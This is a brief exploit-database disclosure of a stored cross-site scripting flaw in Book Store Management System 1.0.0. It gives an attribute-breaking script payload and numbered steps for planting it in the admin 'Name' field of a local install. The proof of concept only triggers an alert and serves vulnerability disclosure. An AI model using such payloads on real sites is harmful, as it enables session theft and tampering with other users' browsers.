Share
## https://sploitus.com/exploit?id=PACKETSTORM:171579
# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)  
# Date: 2022-11-08  
# Exploit Author: Rajeshwar Singh  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip  
# Tested on: Windows/XAMPP  
###########################################################################  
  
Payload use = "><script>alert("XSS")</script>  
  
1. Visit URL http://localhost/bsms_ci/  
2. login with admin Credentials   
3. navigate to user Management  
4. Click on "Add New System User"  
5. Add payload in "Name" input field   
6. Click save.  
7. Visit http://localhost/bsms_ci/index.php/user  
8. XSS payload execute.